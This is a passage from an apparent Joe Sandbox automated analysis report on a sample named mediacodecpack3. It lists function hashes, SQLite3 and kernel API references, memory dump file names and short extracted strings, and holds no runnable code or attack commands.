                                                                                            • Opcode ID: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                            • Instruction ID: 84d28b158f1a11e063f70be148de9c7b2eff514b3bcf7808f17aa895500be78a
                                                                                            • Opcode Fuzzy Hash: 213593095aed0ecc64844f89ed1f3878beaaf7633e295caa013ed5846923251b
                                                                                            • Instruction Fuzzy Hash: 8C3178B0A08324DFEB24CF28C481B4ABBF6FBA5318F04C499E4888B251C775D885DF42
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 609034D8
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903521
                                                                                            • sqlite3_mutex_enter.SQLITE3(-00000200,?,?,6090B22B), ref: 6090354A
                                                                                            • sqlite3_mutex_leave.SQLITE3(-00000200,?,?,6090B22B), ref: 60903563
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                            • Instruction ID: 848dca46e936c6e01d33e08870ae11aa620bd8b24bdb606da7ea596206f2e213
                                                                                            • Opcode Fuzzy Hash: cc0b0c4414a91b2c8747a1fff16426ed14613a144e31e5ae299e51467139190c
                                                                                            • Instruction Fuzzy Hash: 44111F726186218FDB00EF7DC8817597FEAFB66308F00842DE865E7362E779D8819741
                                                                                            APIs
                                                                                            • sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                              • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                            • sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 2673540737-0
                                                                                            • Opcode ID: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                            • Instruction ID: c4988029ba64cfb2248a7cf0c790324acf4c13eb0f9cd3f15fdedc175ef3c91a
                                                                                            • Opcode Fuzzy Hash: 58333c90df1895ca2798dafcbab41657529afc007f85020e925d8580cfdcdfcb
                                                                                            • Instruction Fuzzy Hash: F9019276E143148BCB00EF79D88561ABFE7FBA5324F008528EC9497364E735DC408B81
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                            • String ID:
                                                                                            • API String ID: 3526213481-0
                                                                                            • Opcode ID: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                            • Instruction ID: 98199466554994e62e20ad809be6129e3c08b78dd6d8c38fc18f61524e73aad2
                                                                                            • Opcode Fuzzy Hash: e69664dddad2286ff6ed0cb1f1c7a121e5262b7aa8061cf10291ac83704fea4b
                                                                                            • Instruction Fuzzy Hash: 4101E9B5A043059BCB00EF69D485AAFBBF5EF68654F10C529EC9497304E774D841CF91
                                                                                            APIs
                                                                                            • sqlite3_prepare.SQLITE3 ref: 60969166
                                                                                            • sqlite3_errmsg.SQLITE3 ref: 60969172
                                                                                              • Part of subcall function 609258A8: sqlite3_log.SQLITE3 ref: 609258E5
                                                                                            • sqlite3_errcode.SQLITE3 ref: 6096918A
                                                                                              • Part of subcall function 609251AA: sqlite3_log.SQLITE3 ref: 609251E8
                                                                                            • sqlite3_step.SQLITE3 ref: 60969197
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log$sqlite3_errcodesqlite3_errmsgsqlite3_preparesqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 2877408194-0
                                                                                            • Opcode ID: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                            • Instruction ID: d4ebd4c9a05a553e526e78eaaf80584f3afcfe73b3175c4c6dada352db343273
                                                                                            • Opcode Fuzzy Hash: 06185e76a961c89383dca1620ea17d5683e825aa4cba78efc797247d66345ea8
                                                                                            • Instruction Fuzzy Hash: 9F0186B091C3059BE700EF29C88525DFBE9EFA5314F11892DA89987384E734C940CB86
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_blobsqlite3_value_bytes
                                                                                            • String ID:
                                                                                            • API String ID: 1163609955-0
                                                                                            • Opcode ID: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                            • Instruction ID: 8e0d1a1b7fe9adeaf330fda5a565ce202833de3a42fcd494fa905fee92021967
                                                                                            • Opcode Fuzzy Hash: c446836a4840d302dbdc97fcf3f25a19881b43244be54ce00609cbc101420811
                                                                                            • Instruction Fuzzy Hash: F6F0C8716282145FC3106F3994816697BE6DFA6758F0144A9F584CB314DB75CC82C742
                                                                                            APIs
                                                                                            • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                                            • sqlite3_step.SQLITE3 ref: 609615C9
                                                                                            • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                                              • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                                            • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                                            • String ID:
                                                                                            • API String ID: 4265739436-0
                                                                                            • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                            • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                                            • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                                            • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                                            APIs
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID:
                                                                                            • API String ID: 1477753154-0
                                                                                            • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                            • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                                            • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                                            • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: into$out of
                                                                                            • API String ID: 632333372-1114767565
                                                                                            • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                            • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                                            • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                                            • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                                            APIs
                                                                                              • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                                            • sqlite3_free.SQLITE3 ref: 609193A3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_value_text
                                                                                            • String ID: (NULL)$NULL
                                                                                            • API String ID: 2175239460-873412390
                                                                                            • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                            • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                                            • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                                            • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00405BB3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID: $
                                                                                            • API String ID: 1807457897-3032137957
                                                                                            • Opcode ID: d62f257e1640a576e7c9989f97778ac9c58cbb7090796bbb9a31cafd0bd77437
                                                                                            • Instruction ID: d944e0326c6926f7701021ceed1c995ec26cf4905102b61f872e2d2972a5c282
                                                                                            • Opcode Fuzzy Hash: d62f257e1640a576e7c9989f97778ac9c58cbb7090796bbb9a31cafd0bd77437
                                                                                            • Instruction Fuzzy Hash: 824168300186589AFB119724CD89BFB3FA9EB05B00F1400FAD586FB1D2C2394954DFAA
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: string or blob too big$|
                                                                                            • API String ID: 632333372-330586046
                                                                                            • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                            • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                            • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                            • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: d$|
                                                                                            • API String ID: 632333372-415524447
                                                                                            • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                            • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                                            • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                                            • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: -- $d
                                                                                            • API String ID: 632333372-777087308
                                                                                            • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                            • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                                                            • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                                            • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_logsqlite3_value_text
                                                                                            • String ID: string or blob too big
                                                                                            • API String ID: 2320820228-2803948771
                                                                                            • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                            • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                            • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                            • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                            APIs
                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                            • String ID:
                                                                                            • API String ID: 3265351223-3916222277
                                                                                            • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                            • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                            • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_stricmp
                                                                                            • String ID: log
                                                                                            • API String ID: 912767213-2403297477
                                                                                            • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                            • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                            • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982772996.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2982744943.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982916341.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982939108.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2982967209.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983000459.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000002.00000002.2983025857.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_60900000_mediacodecpack3.jbxd
                                                                                            Similarity
